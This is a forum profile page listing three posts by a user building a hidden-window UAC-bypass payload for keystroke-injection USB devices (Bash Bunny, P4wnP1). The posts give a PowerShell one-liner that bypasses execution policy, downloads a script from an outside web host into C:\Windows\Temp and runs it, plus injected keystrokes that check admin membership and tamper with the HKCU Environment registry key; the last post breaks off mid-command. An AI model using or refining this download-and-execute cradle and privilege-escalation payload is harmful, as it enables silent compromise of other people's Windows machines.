Jump to content

KryptoKat

Members
  • Content Count

    3
  • Joined

  • Last visited

Everything posted by KryptoKat

  1. ---UPDATE--- I finally got the PowerShell script functioning, in theory, this should work on any account because everyone has access to C:\Windows\Temp powershell -w h -ep bypass curl -OutFile 'C:\Windows\Temp\uac.ps1' 'petrolic-designator.000webhostapp.com/uac.txt'; C:\Windows\Temp\uac.ps1 Now to find something useful to do with this
  2. ---UPDATE--- I've Simplified the script to powershell -w h curl -OutFile '%USERPROFILE%\uac.ps1' 'petrolic-designator.000webhostapp.com/uac.txt'; However I'm having trouble running the file in the same line, any help would be greatly appreciated
  3. In theory, this bash bunny script should make a directory in C:\Windows called uac-bypassed I have no way to test this specific script because I don't have a bash bunny or a rubber ducky, so I had to make do with a P4wnP1 A.L.O.A. any help making this payload smaller would be greatly appreciated. (The command at the bottom is for the P4wnP1 A.L.O.A) Q GUI R Q powershell Q ENTER Q DELAY 500 Q "echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\";
×
×
  • Create New...